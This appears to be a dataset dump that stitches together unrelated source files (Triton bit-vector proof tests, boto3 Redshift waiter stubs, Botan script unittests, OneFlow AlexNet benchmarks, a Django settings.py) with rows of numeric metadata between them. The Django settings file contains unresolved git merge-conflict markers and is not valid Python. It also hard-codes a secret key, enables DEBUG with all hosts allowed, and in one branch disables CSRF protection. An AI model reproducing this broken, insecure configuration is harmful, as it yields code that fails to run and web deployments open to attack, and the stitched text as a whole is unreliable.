    diff = self.ast.bvsub(sym, self.ast.bv(0, 32))
    self.assertTrue(self.proof(diff == sym))
def test_sub2(self):
    """Prove 0 - x == -x (subtraction from zero is negation)."""
    sym = self.ast.variable(self.ctx.newSymbolicVariable(32))
    diff = self.ast.bvsub(self.ast.bv(0, 32), sym)
    self.assertTrue(self.proof(diff == -sym))
def test_sub3(self):
    """Prove x - x == 0."""
    sym = self.ast.variable(self.ctx.newSymbolicVariable(32))
    self.assertTrue(self.proof(self.ast.bvsub(sym, sym) == 0))
def test_udiv(self):
    """Prove x udiv 1 == x (one is the identity of unsigned division)."""
    sym = self.ast.variable(self.ctx.newSymbolicVariable(32))
    quotient = self.ast.bvudiv(sym, self.ast.bv(1, 32))
    self.assertTrue(self.proof(quotient == sym))
def test_xor1(self):
    """Prove x ^ 0 == x (zero is the identity of xor, right side)."""
    sym = self.ast.variable(self.ctx.newSymbolicVariable(32))
    xored = self.ast.bvxor(sym, self.ast.bv(0, 32))
    self.assertTrue(self.proof(xored == sym))
def test_xor2(self):
    """Prove 0 ^ x == x (zero is the identity of xor, left side)."""
    sym = self.ast.variable(self.ctx.newSymbolicVariable(32))
    xored = self.ast.bvxor(self.ast.bv(0, 32), sym)
    self.assertTrue(self.proof(xored == sym))
def test_xor3(self):
    """Prove x ^ x == 0 (xor is self-inverse)."""
    sym = self.ast.variable(self.ctx.newSymbolicVariable(32))
    self.assertTrue(self.proof(self.ast.bvxor(sym, sym) == 0))
| 32.863378
| 94
| 0.56054
| 2,420
| 17,319
| 3.96281
| 0.057438
| 0.128467
| 0.057247
| 0.216267
| 0.856204
| 0.836809
| 0.836809
| 0.836809
| 0.836809
| 0.836809
| 0
| 0.044518
| 0.285351
| 17,319
| 526
| 95
| 32.925856
| 0.730306
| 0.032796
| 0
| 0.847291
| 0
| 0
| 0.008622
| 0
| 0
| 0
| 0
| 0
| 0.169951
| 1
| 0.179803
| false
| 0
| 0.004926
| 0
| 0.236453
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
a608e218251154c908846ee3550b0eb26ab84bbc
| 77
|
py
|
Python
|
increment.py
|
rresender/python-samples
|
2fb2330f59f3cc0c6b975381e22268a758773b69
|
[
"MIT"
] | null | null | null |
increment.py
|
rresender/python-samples
|
2fb2330f59f3cc0c6b975381e22268a758773b69
|
[
"MIT"
] | null | null | null |
increment.py
|
rresender/python-samples
|
2fb2330f59f3cc0c6b975381e22268a758773b69
|
[
"MIT"
] | null | null | null |
def add_one(num):
    """Return *num* incremented by one.

    The original implementation used the two's-complement identity
    ``-(~num) == num + 1``, which only works for integers (``~`` raises
    TypeError on floats).  Plain addition is clearer and also generalizes
    to floats while producing identical results for all ints.
    """
    return num + 1


print(add_one(3))
print(add_one(99))
| 12.833333
| 20
| 0.636364
| 14
| 77
| 3.285714
| 0.571429
| 0.391304
| 0.478261
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.045455
| 0.142857
| 77
| 6
| 21
| 12.833333
| 0.651515
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0
| 0.25
| 0.5
| 0.5
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
|
0
| 7
|
a6706c7eaf26b931ebbe9697c1bce4fd98f160f9
| 17,832
|
py
|
Python
|
boto3_type_annotations_with_docs/boto3_type_annotations/redshift/waiter.py
|
cowboygneox/boto3_type_annotations
|
450dce1de4e066b939de7eac2ec560ed1a7ddaa2
|
[
"MIT"
] | 119
|
2018-12-01T18:20:57.000Z
|
2022-02-02T10:31:29.000Z
|
boto3_type_annotations_with_docs/boto3_type_annotations/redshift/waiter.py
|
cowboygneox/boto3_type_annotations
|
450dce1de4e066b939de7eac2ec560ed1a7ddaa2
|
[
"MIT"
] | 15
|
2018-11-16T00:16:44.000Z
|
2021-11-13T03:44:18.000Z
|
boto3_type_annotations_with_docs/boto3_type_annotations/redshift/waiter.py
|
cowboygneox/boto3_type_annotations
|
450dce1de4e066b939de7eac2ec560ed1a7ddaa2
|
[
"MIT"
] | 11
|
2019-05-06T05:26:51.000Z
|
2021-09-28T15:27:59.000Z
|
from typing import Dict
from datetime import datetime
from typing import List
from botocore.waiter import Waiter
class ClusterAvailable(Waiter):
    """Waiter that blocks until a Redshift cluster becomes available."""

    def wait(self, ClusterIdentifier: str = None, MaxRecords: int = None, Marker: str = None, TagKeys: List = None, TagValues: List = None, WaiterConfig: Dict = None):
        """
        Poll :py:meth:`Redshift.Client.describe_clusters` every 60 seconds
        until a successful state is reached; an error is returned after 30
        failed checks.

        See `AWS API Documentation
        <https://docs.aws.amazon.com/goto/WebAPI/redshift-2012-12-01/DescribeClusters>`_.

        :param ClusterIdentifier: Unique, case-sensitive cluster identifier.
            By default, all clusters defined for the account are matched.
        :param MaxRecords: Maximum response records per call (minimum 20,
            maximum 100, default 100); further records are paged via the
            returned marker.
        :param Marker: Pagination marker returned by a previous
            DescribeClusters call.  Specify either **ClusterIdentifier** or
            **Marker**, but not both.
        :param TagKeys: Tag key(s); clusters carrying any of them match.
        :param TagValues: Tag value(s); clusters carrying any of them match.
        :param WaiterConfig: Dict controlling polling: ``Delay`` (seconds
            between attempts, default 60) and ``MaxAttempts`` (default 30).
        :returns: None
        """
        pass
class ClusterDeleted(Waiter):
    """Waiter that blocks until a Redshift cluster has been deleted."""

    def wait(self, ClusterIdentifier: str = None, MaxRecords: int = None, Marker: str = None, TagKeys: List = None, TagValues: List = None, WaiterConfig: Dict = None):
        """
        Poll :py:meth:`Redshift.Client.describe_clusters` every 60 seconds
        until a successful state is reached; an error is returned after 30
        failed checks.

        See `AWS API Documentation
        <https://docs.aws.amazon.com/goto/WebAPI/redshift-2012-12-01/DescribeClusters>`_.

        :param ClusterIdentifier: Unique, case-sensitive cluster identifier.
            By default, all clusters defined for the account are matched.
        :param MaxRecords: Maximum response records per call (minimum 20,
            maximum 100, default 100); further records are paged via the
            returned marker.
        :param Marker: Pagination marker returned by a previous
            DescribeClusters call.  Specify either **ClusterIdentifier** or
            **Marker**, but not both.
        :param TagKeys: Tag key(s); clusters carrying any of them match.
        :param TagValues: Tag value(s); clusters carrying any of them match.
        :param WaiterConfig: Dict controlling polling: ``Delay`` (seconds
            between attempts, default 60) and ``MaxAttempts`` (default 30).
        :returns: None
        """
        pass
class ClusterRestored(Waiter):
    """Waiter that blocks until a Redshift cluster restore completes."""

    def wait(self, ClusterIdentifier: str = None, MaxRecords: int = None, Marker: str = None, TagKeys: List = None, TagValues: List = None, WaiterConfig: Dict = None):
        """
        Poll :py:meth:`Redshift.Client.describe_clusters` every 60 seconds
        until a successful state is reached; an error is returned after 30
        failed checks.

        See `AWS API Documentation
        <https://docs.aws.amazon.com/goto/WebAPI/redshift-2012-12-01/DescribeClusters>`_.

        :param ClusterIdentifier: Unique, case-sensitive cluster identifier.
            By default, all clusters defined for the account are matched.
        :param MaxRecords: Maximum response records per call (minimum 20,
            maximum 100, default 100); further records are paged via the
            returned marker.
        :param Marker: Pagination marker returned by a previous
            DescribeClusters call.  Specify either **ClusterIdentifier** or
            **Marker**, but not both.
        :param TagKeys: Tag key(s); clusters carrying any of them match.
        :param TagValues: Tag value(s); clusters carrying any of them match.
        :param WaiterConfig: Dict controlling polling: ``Delay`` (seconds
            between attempts, default 60) and ``MaxAttempts`` (default 30).
        :returns: None
        """
        pass
class SnapshotAvailable(Waiter):
    """Waiter that blocks until a Redshift cluster snapshot is available."""

    def wait(self, ClusterIdentifier: str = None, SnapshotIdentifier: str = None, SnapshotType: str = None, StartTime: datetime = None, EndTime: datetime = None, MaxRecords: int = None, Marker: str = None, OwnerAccount: str = None, TagKeys: List = None, TagValues: List = None, ClusterExists: bool = None, SortingEntities: List = None, WaiterConfig: Dict = None):
        """
        Poll :py:meth:`Redshift.Client.describe_cluster_snapshots` every 15
        seconds until a successful state is reached; an error is returned
        after 20 failed checks.

        See `AWS API Documentation
        <https://docs.aws.amazon.com/goto/WebAPI/redshift-2012-12-01/DescribeClusterSnapshots>`_.

        :param ClusterIdentifier: Identifier of the cluster that generated
            the requested snapshots.
        :param SnapshotIdentifier: Identifier of a specific snapshot to
            describe.
        :param SnapshotType: Snapshot type filter; valid values are
            ``automated`` and ``manual`` (all types by default).
        :param StartTime: Only snapshots created at or after this time
            (ISO 8601, e.g. ``2012-07-16T18:00:00Z``).
        :param EndTime: Only snapshots created at or before this time
            (ISO 8601).
        :param MaxRecords: Maximum response records per call (minimum 20,
            maximum 100, default 100); further records are paged via the
            returned marker.
        :param Marker: Pagination marker returned by a previous
            DescribeClusterSnapshots call.
        :param OwnerAccount: AWS customer account that created or copied the
            snapshot; filters results to that owner.
        :param TagKeys: Tag key(s); snapshots carrying any of them match.
        :param TagValues: Tag value(s); snapshots carrying any of them match.
        :param ClusterExists: Restrict results to existing clusters.  When
            ``true``, ``ClusterIdentifier`` is required; when ``false``,
            behavior depends on whether ``ClusterIdentifier`` names a
            deleted or existing cluster (orphaned snapshots are returned
            when it is omitted).
        :param SortingEntities: List of dicts, each with a required
            ``Attribute`` (``SOURCE_TYPE`` | ``TOTAL_SIZE`` | ``CREATE_TIME``)
            and an optional ``SortOrder`` (``ASC`` | ``DESC``).
        :param WaiterConfig: Dict controlling polling: ``Delay`` (seconds
            between attempts, default 15) and ``MaxAttempts`` (default 20).
        :returns: None
        """
        pass
| 65.558824
| 433
| 0.654666
| 2,210
| 17,832
| 5.274208
| 0.11629
| 0.012011
| 0.0151
| 0.019218
| 0.841198
| 0.836393
| 0.832447
| 0.826012
| 0.811599
| 0.811599
| 0
| 0.0158
| 0.275965
| 17,832
| 271
| 434
| 65.800738
| 0.886996
| 0.821837
| 0
| 0.4375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0.25
| 0.25
| 0
| 0.75
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 10
|
a6a22f3f0b5a35cc40fc045991acd2d353405a71
| 8,658
|
py
|
Python
|
src/scripts/python_unittests.py
|
clayne/botan
|
1f16adea08c4c9bf3fb0fbf699d284cb48150898
|
[
"BSD-2-Clause"
] | 1,988
|
2015-01-04T02:58:16.000Z
|
2022-03-31T18:03:37.000Z
|
src/scripts/python_unittests.py
|
evpo/botan
|
6f8a696962c3aa605e9e5a53710c96dcb8477c9f
|
[
"BSD-2-Clause"
] | 2,455
|
2015-01-04T17:53:39.000Z
|
2022-03-30T18:15:31.000Z
|
src/scripts/python_unittests.py
|
evpo/botan
|
6f8a696962c3aa605e9e5a53710c96dcb8477c9f
|
[
"BSD-2-Clause"
] | 590
|
2015-01-07T04:05:12.000Z
|
2022-03-30T20:42:05.000Z
|
#!/usr/bin/env python3
"""
Unittests for Botan Python scripts.
Requires Python 3.
(C) 2017 Simon Warta (Kullo GmbH)
Botan is released under the Simplified BSD License (see license.txt)
"""
import sys
import unittest
sys.path.append("../..") # Botan repo root
from configure import AmalgamationHelper # pylint: disable=wrong-import-position
from configure import ModulesChooser # pylint: disable=wrong-import-position
class AmalgamationHelperTests(unittest.TestCase):
    """Exercise the include-line matchers of configure.AmalgamationHelper."""

    def test_matcher_std_includes(self):
        # Only unindented, unconditional std includes match; the header
        # name is returned without the angle brackets.
        matcher = AmalgamationHelper.is_unconditional_std_include
        self.assertEqual(matcher("#include <string>"), "string")
        self.assertEqual(matcher("#include <string> // comment"), "string")
        self.assertEqual(matcher("#include <myfile.h>"), None)
        self.assertEqual(matcher("#include <unistd.h>"), None)
        self.assertEqual(matcher("  #include <string>"), None)

    def test_matcher_botan_include(self):
        # Botan includes match with or without indentation and trailing
        # comments; the path inside <botan/...> is returned.
        matcher = AmalgamationHelper.is_botan_include
        expectations = [
            ("#include <botan/oids.h>", "oids.h"),
            ("#include <botan/internal/socket.h>", "internal/socket.h"),
            ("#include <botan/oids.h> // comment", "oids.h"),
            ("#include <botan/internal/socket.h> // comment", "internal/socket.h"),
            ("  #include <botan/oids.h>", "oids.h"),
            ("  #include <botan/internal/socket.h>", "internal/socket.h"),
            ("#include <string>", None),
            ("#include <myfile.h>", None),
            ("#include <unistd.h>", None),
        ]
        for line, expected in expectations:
            self.assertEqual(matcher(line), expected)

    def test_matcher_any_includes(self):
        # The generic matcher accepts std, local and botan headers alike.
        matcher = AmalgamationHelper.is_any_include
        expectations = [
            ("#include <string>", "string"),
            ("#include <myfile.h>", "myfile.h"),
            ("#include <unistd.h>", "unistd.h"),
            ("#include <botan/oids.h>", "botan/oids.h"),
            ("  #include <string>", "string"),
            ("  #include <myfile.h>", "myfile.h"),
            ("  #include <unistd.h>", "unistd.h"),
            ("  #include <botan/oids.h>", "botan/oids.h"),
            ("#include <string> // comment", "string"),
            ("#include <myfile.h> // comment", "myfile.h"),
            ("#include <unistd.h> // comment", "unistd.h"),
            ("#include <botan/oids.h> // comment", "botan/oids.h"),
        ]
        for line, expected in expectations:
            self.assertEqual(matcher(line), expected)
class ModulesChooserResolveDependencies(unittest.TestCase):
    """Behavioral checks for ModulesChooser.resolve_dependencies."""

    @staticmethod
    def _resolve(available, table, module):
        # Thin wrapper so every test reads as data plus expectation.
        return ModulesChooser.resolve_dependencies(set(available), table, module)

    def test_base(self):
        ok, chosen = self._resolve({"A", "B"}, {"A": []}, "A")
        self.assertTrue(ok)
        self.assertEqual(chosen, {"A"})

    def test_no_dependencies_defined(self):
        # A module (or dependency) missing from the table raises KeyError.
        with self.assertRaises(KeyError):
            self._resolve({"A", "B"}, {"A": []}, "B")
        with self.assertRaises(KeyError):
            self._resolve({"A", "B"}, {"A": ["B"]}, "A")

    def test_add_dependency(self):
        ok, chosen = self._resolve({"A", "B"}, {"A": ["B"], "B": []}, "A")
        self.assertTrue(ok)
        self.assertEqual(chosen, {"A", "B"})

    def test_add_dependencies_two_levels(self):
        table = {"A": ["B"], "B": ["C"], "C": []}
        ok, chosen = self._resolve({"A", "B", "C"}, table, "A")
        self.assertTrue(ok)
        self.assertEqual(chosen, {"A", "B", "C"})

    def test_circular(self):
        # Circular dependencies resolve as long as every module is available.
        table = {"A": ["B"], "B": ["C"], "C": ["A"]}
        ok, chosen = self._resolve({"A", "B", "C"}, table, "A")
        self.assertTrue(ok)
        self.assertEqual(chosen, {"A", "B", "C"})

    def test_not_available(self):
        table = {"A": ["B"], "B": ["C"], "C": ["A"]}
        ok, _ = self._resolve({"A", "C"}, table, "B")
        self.assertFalse(ok)

    def test_dependency_not_available(self):
        table = {"A": ["B"], "B": ["C"], "C": ["A"]}
        ok, _ = self._resolve({"A", "C"}, table, "A")
        self.assertFalse(ok)

    def test_dependency2_not_available(self):
        table = {"A": ["B"], "B": ["C"], "C": ["A"]}
        ok, _ = self._resolve({"A", "B"}, table, "A")
        self.assertFalse(ok)

    def test_dependency_choices(self):
        # "B|C" means either module satisfies the dependency.
        table = {"A": ["B|C"], "B": [], "C": []}
        ok, chosen = self._resolve({"A", "B", "C"}, table, "A")
        self.assertTrue(ok)
        self.assertTrue(chosen == {"A", "B"} or chosen == {"A", "C"})

    def test_dependency_prefer_existing(self):
        # A module already pulled in wins an alternative choice.
        table = {"A": ["C", "B|C"], "B": [], "C": []}
        ok, chosen = self._resolve({"A", "B", "C"}, table, "A")
        self.assertTrue(ok)
        self.assertEqual(chosen, {"A", "C"})

    def test_dependency_prefer_existing2(self):
        table = {"A": ["B", "B|C"], "B": [], "C": []}
        ok, chosen = self._resolve({"A", "B", "C"}, table, "A")
        self.assertTrue(ok)
        self.assertEqual(chosen, {"A", "B"})

    def test_dependency_choices_impossible(self):
        # Only one alternative is available; it is selected.
        table = {"A": ["B|C"], "B": [], "C": []}
        ok, chosen = self._resolve({"A", "C"}, table, "A")
        self.assertTrue(ok)
        self.assertEqual(chosen, {"A", "C"})

    def test_dependency_choices_impossible2(self):
        table = {"A": ["B|C"], "B": [], "C": []}
        ok, chosen = self._resolve({"A", "B"}, table, "A")
        self.assertTrue(ok)
        self.assertEqual(chosen, {"A", "B"})

    def test_deep(self):
        table = {
            "A": ["B|C"],
            "B": ["D"],
            "C": ["E"],
            "D": [],
            "E": ["F|G"],
            "F": ["A", "B"],
            "G": ["A", "G"],
        }
        ok, chosen = self._resolve({"A", "B", "C", "E", "G"}, table, "G")
        self.assertTrue(ok)
        self.assertEqual(chosen, {"G", "A", "C", "E"})
if __name__ == '__main__':
    # Show both the standard and any custom message on assertion failures.
    unittest.TestCase.longMessage = True
    unittest.main()
| 38.48
| 115
| 0.575075
| 887
| 8,658
| 5.43743
| 0.118377
| 0.108853
| 0.177898
| 0.188679
| 0.848227
| 0.828737
| 0.811735
| 0.794734
| 0.741655
| 0.661621
| 0
| 0.001413
| 0.264264
| 8,658
| 224
| 116
| 38.651786
| 0.75573
| 0.031647
| 0
| 0.613757
| 0
| 0
| 0.119551
| 0.008957
| 0
| 0
| 0
| 0
| 0.269841
| 1
| 0.089947
| false
| 0
| 0.021164
| 0
| 0.121693
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a6d8984df7d60279f2ca75abcc73778b1ab427c3
| 1,287
|
py
|
Python
|
benchmark/test_alexnet.py
|
Oneflow-Inc/vision
|
352e9240f63118112ea174bb2d0b502fa54be16f
|
[
"BSD-3-Clause"
] | 40
|
2021-10-19T02:34:56.000Z
|
2022-03-25T07:49:44.000Z
|
benchmark/test_alexnet.py
|
Oneflow-Inc/vision
|
352e9240f63118112ea174bb2d0b502fa54be16f
|
[
"BSD-3-Clause"
] | 53
|
2021-10-22T02:24:44.000Z
|
2022-03-31T04:20:47.000Z
|
benchmark/test_alexnet.py
|
Oneflow-Inc/vision
|
352e9240f63118112ea174bb2d0b502fa54be16f
|
[
"BSD-3-Clause"
] | 11
|
2022-01-06T02:57:07.000Z
|
2022-03-23T15:19:51.000Z
|
from benchmark import *
import oneflow_benchmark
from flowvision.models.alexnet import alexnet
@oneflow_benchmark.ci_settings(compare={"median": "5%"})
def test_alexnet_batch_size1(benchmark, net=alexnet, input_shape=(1, 3, 224, 224)):
    """Benchmark one AlexNet train step (forward/backward/update) at batch size 1.

    The default shape is a tuple to avoid the shared-mutable-default
    pitfall; ``fetch_args`` still receives a list as before.
    """
    model, x, optimizer = fetch_args(net, list(input_shape))
    benchmark(run, model, x, optimizer)
@oneflow_benchmark.ci_settings(compare={"median": "5%"})
def test_alexnet_batch_size2(benchmark, net=alexnet, input_shape=(2, 3, 224, 224)):
    """Benchmark one AlexNet train step (forward/backward/update) at batch size 2.

    The default shape is a tuple to avoid the shared-mutable-default
    pitfall; ``fetch_args`` still receives a list as before.
    """
    model, x, optimizer = fetch_args(net, list(input_shape))
    benchmark(run, model, x, optimizer)
@oneflow_benchmark.ci_settings(compare={"median": "5%"})
def test_alexnet_batch_size4(benchmark, net=alexnet, input_shape=(4, 3, 224, 224)):
    """Benchmark one AlexNet train step (forward/backward/update) at batch size 4.

    The default shape is a tuple to avoid the shared-mutable-default
    pitfall; ``fetch_args`` still receives a list as before.
    """
    model, x, optimizer = fetch_args(net, list(input_shape))
    benchmark(run, model, x, optimizer)
@oneflow_benchmark.ci_settings(compare={"median": "5%"})
def test_alexnet_batch_size8(benchmark, net=alexnet, input_shape=(8, 3, 224, 224)):
    """Benchmark one AlexNet train step (forward/backward/update) at batch size 8.

    The default shape is a tuple to avoid the shared-mutable-default
    pitfall; ``fetch_args`` still receives a list as before.
    """
    model, x, optimizer = fetch_args(net, list(input_shape))
    benchmark(run, model, x, optimizer)
@oneflow_benchmark.ci_settings(compare={"median": "5%"})
def test_alexnet_batch_size16(benchmark, net=alexnet, input_shape=(16, 3, 224, 224)):
    """Benchmark one AlexNet train step (forward/backward/update) at batch size 16.

    The default shape is a tuple to avoid the shared-mutable-default
    pitfall; ``fetch_args`` still receives a list as before.
    """
    model, x, optimizer = fetch_args(net, list(input_shape))
    benchmark(run, model, x, optimizer)
| 37.852941
| 85
| 0.737374
| 182
| 1,287
| 4.989011
| 0.197802
| 0.110132
| 0.165198
| 0.143172
| 0.875551
| 0.715859
| 0.715859
| 0.715859
| 0.715859
| 0.715859
| 0
| 0.045936
| 0.120435
| 1,287
| 33
| 86
| 39
| 0.756184
| 0
| 0
| 0.652174
| 0
| 0
| 0.03108
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.217391
| false
| 0
| 0.130435
| 0
| 0.347826
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5b296994533fb66c27fe0e7681ef3cf94c5ef1a4
| 8,032
|
py
|
Python
|
tantan/settings.py
|
wei6740714/tantan
|
94bfac3a55841bfab4f8d656026ddab9013a9df0
|
[
"MIT"
] | null | null | null |
tantan/settings.py
|
wei6740714/tantan
|
94bfac3a55841bfab4f8d656026ddab9013a9df0
|
[
"MIT"
] | null | null | null |
tantan/settings.py
|
wei6740714/tantan
|
94bfac3a55841bfab4f8d656026ddab9013a9df0
|
[
"MIT"
] | null | null | null |
<<<<<<< HEAD
"""
Django settings for tantan project.
Generated by 'django-admin startproject' using Django 1.11.15.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'u_u$r8po3p3r@%-q07ms2vi=%7#ovh#9lp%ks%&z*behnnueh2'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['*']
# Application definition
INSTALLED_APPS = [
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'tantan.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
],
},
},
]
WSGI_APPLICATION = 'tantan.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'zh-cn'
TIME_ZONE = 'Asia/Shanghai'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
=======
"""
Django settings for tantan project.
Generated by 'django-admin startproject' using Django 1.11.15.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'u_u$r8po3p3r@%-q07ms2vi=%7#ovh#9lp%ks%&z*behnnueh2'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['*']
# Application definition
INSTALLED_APPS = [
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'user',
'social',
'vip',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
# 'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'common.middleware.MiddlewareAuth',
'common.middleware.MiddlewareException',
]
ROOT_URLCONF = 'tantan.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'tantan.wsgi.application'
# Django的缓存配置
CACHES = {
"default": {
"BACKEND": "django_redis.cache.RedisCache",
"LOCATION": "redis://127.0.0.1:6379/9",
"OPTIONS": {
"CLIENT_CLASS": "django_redis.client.DefaultClient",
}
}
}
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'zh-hans'
TIME_ZONE = 'Asia/Shanghai'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = 'static/'
MEDIA_URL = 'media/'
#########################
## Django Logging BEGIN
#########################
# LOGGING_DIR 日志文件存放目录
LOGGING_DIR = os.path.join(BASE_DIR, "logs")
if not os.path.exists(LOGGING_DIR):
os.mkdir(LOGGING_DIR)
import logging
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'standard': {
'format': '%(levelname)s %(asctime)s %(filename)s %(funcName)s %(lineno)d %(message)s'
},
'simple': {
'format': '%(levelname)s %(message)s',
'datefmt': '%Y-%m-%d %H:%M:%S'
},
},
'filters': {
'require_debug_true': {
'()': 'django.utils.log.RequireDebugTrue',
},
},
'handlers': {
'console': {
'level': 'DEBUG',
'filters': ['require_debug_true'],
'class': 'logging.StreamHandler',
'formatter': 'simple'
},
'file_handler': {
'level': 'INFO',
'class': 'logging.handlers.TimedRotatingFileHandler',
'filename': '%s/django.log' % LOGGING_DIR,
'formatter':'standard',
'encoding': 'utf-8'
}, # 用于文件输出
'mail_admins': {
'level': 'ERROR',
'class': 'django.utils.log.AdminEmailHandler',
'formatter':'standard'
},
},
'loggers': {
'mdjango': {
'handlers': ['file_handler'],
'level':'DEBUG',
'propagate': True,
},
'django.request': {
# 一个记录器中可以使用多个处理器
'handlers': ['console','mail_admins'],
'level': 'ERROR',
'propagate': False,
},
}
}
#########################
## Django Logging END
#########################
>>>>>>> 51434351d03eef12202b428265949b72c76c29a7
| 25.498413
| 98
| 0.625996
| 818
| 8,032
| 6.050122
| 0.271394
| 0.049909
| 0.062235
| 0.070721
| 0.746615
| 0.728632
| 0.728632
| 0.728632
| 0.728632
| 0.728632
| 0
| 0.020704
| 0.218252
| 8,032
| 314
| 99
| 25.579618
| 0.767479
| 0.190239
| 0
| 0.421053
| 1
| 0.005263
| 0.49707
| 0.353223
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.052632
| 0.015789
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
